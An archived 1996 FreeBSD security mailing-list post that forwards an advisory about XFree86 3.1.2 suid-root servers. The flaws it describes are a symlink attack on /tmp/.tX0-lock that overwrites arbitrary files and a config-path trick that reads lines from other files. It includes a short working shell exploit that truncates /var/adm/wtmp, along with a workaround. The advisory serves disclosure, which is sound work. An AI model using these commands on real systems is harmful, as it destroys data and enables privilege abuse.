Date: Mon, 29 Jan 96 11:44:35 -0800 From: Cy Schubert - BCSC Open Systems Group <cschuber@uumail.gov.bc.ca> To: freebsd-security@freebsd.org Subject: XFree86 3.1.2 Security Problems Message-ID: <199601291944.LAA11338@passer.osg.gov.bc.ca>
index | next in thread | raw e-mail
I just recieved this from another security news group. I haven't had a chance
to verify this under FreeBSD (at home), however I have no reason to believe that
this wouldn't affect FreeBSD as well. Would anyone be willing to comment on
this?
Regards, Phone: (604)389-3827
Cy Schubert OV/VM: BCSC02(CSCHUBER)
Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET
BC Systems Corp. Internet: cschuber@uumail.gov.bc.ca
cschuber@bcsc02.gov.bc.ca
"Quit spooling around, JES do it."
------- Forwarded Message
There are security holes in XFree86 3.1.2, which installs its servers
as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files,
it does not take proper precautions to ensure that file permissions are
maintained, resulting in the ability to overwrite files, and to read
limited portions of other files.
The first problem stems from the server opening a temporary file,
/tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this
file a symlink, the server will overwrite the original file, and then
write to it its current pid.
Other problems exist in the server relating to similar problems, one
such example is the ability to specify an arbitrary file for the XF86config
file which will then be opened, and the first line that fails to match
the expected format will be output with an error, allowing a line to be
read from an arbitrary file.
Program: XFree86 3.1.2 servers
Affected Operating Systems: All systems with XFree86 3.1.2 installed
Requirements: account on system
Temporary Patch: chmod o-x /usr/X11R6/bin/XF86*
Security Compromise: overwrite arbitrary files
Author: Dave M. (davem@cmu.edu)
Synopsis: While running suid root, XFree86 servers do
not properly check file permissions, allowing
a user to overwrite arbitrary files on a
system.
Exploit:
$ ls -l /var/adm/wtmp
- -rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp
$ ln -s /var/adm/wtmp /tmp/.tX0-lock
$ startx
(At this point exit X if it started, or else ignore any error messages)
$ ls -l /var/adm/wtmp
- -r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp
/-------------\
|David Meltzer|
|davem@cmu.edu|
/--------------------------\
|School of Computer Science|
|Carnegie Mellon University|
\--------------------------/
------- End of Forwarded Message
help
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199601291944.LAA11338>